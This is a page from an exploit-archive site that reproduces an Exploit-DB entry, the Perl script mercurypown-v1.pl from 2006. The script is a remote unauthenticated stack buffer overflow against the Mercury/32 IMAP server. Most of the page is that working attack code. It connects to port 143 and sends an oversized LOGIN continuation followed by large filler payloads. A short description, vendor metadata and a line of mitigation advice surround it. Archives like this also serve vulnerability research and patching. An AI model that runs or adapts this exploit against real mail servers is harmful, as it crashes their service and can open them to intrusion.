Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
mercurypown-v1.pl - exploit.company
header-logo
Suggest Exploit
vendor:
Mercury/32
by:
mu-b
7.5
CVSS
HIGH
Stack-based buffer overflow
119
CWE
Product Name: Mercury/32
Affected Version From: Mercury/32 v4.01a (win32)
Affected Version To: Mercury/32 v4.01b (win32)
Patch Exists: NO
Related CWE:
CPE: a:mercury-interactive:mercury/32:4.01b
Metasploit:
Other Scripts:
Platforms Tested: Windows
2006

mercurypown-v1.pl

Mercury/32 <v4.01b (win32) remote exploit. The vulnerability is caused by Mercury/32 concatenating continuation data into a fixed sized buffer disregarding the length of the original command. This allows an attacker to trigger a stack-based buffer overflow without requiring authentication. The exploit takes advantage of a stack frame that calls end_thread before returning. There are at least two different ways to exploit this vulnerability: controlling a pointer into sprintf and/or controlling a pointer to be free().

Mitigation:

Apply the latest patches and updates from the vendor. Limit access to the affected service.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# mercurypown-v1.pl
#
# Mercury/32 <v4.01b (win32) remote exploit
# by mu-b - 28 Nov 2006
#
# - Tested on: Mercury/32 v4.01a (win32)
#              Mercury/32 v4.01b (win32)
#
# Stack-based buffer overflow caused by Mercury/32 concatenating
# continuation data into a fixed sized buffer disregarding
# the length of the original command, you do not require authentication.
#
# This is a little harder to exploit than usual since the
# stack frame in question calls end_thread before returning..
# buts it's still possible by at *least* two different ways...
# (i.e. controlling a pointer into sprintf and/or controlling
#  a pointer to be free()).
#
########

use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 1;

my $NOP = 'A';
my $LEN = 9200;#8928;
my $BUFLEN = 8192;

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    $buf = "1 LOGIN".(" "x($LEN-$BUFLEN))."\{255\}\n";
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("-> * Sending payload\n");
    $buf = $NOP x 255;
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("-> * Sending payload 2\n");
    $buf = $NOP x $BUFLEN;
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("-> * Successfully sent payload!\n");
}

sub print_header {
    print("Mercury/32 <v4.01b (win32) remote exploit\n");
    print("by: <mu-b\@digit-labs.org>\n\n");
}

sub usage {
    print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    return(1337);
}

# milw0rm.com [2007-03-06]

Navigation

Suggest Exploit

Services By CQR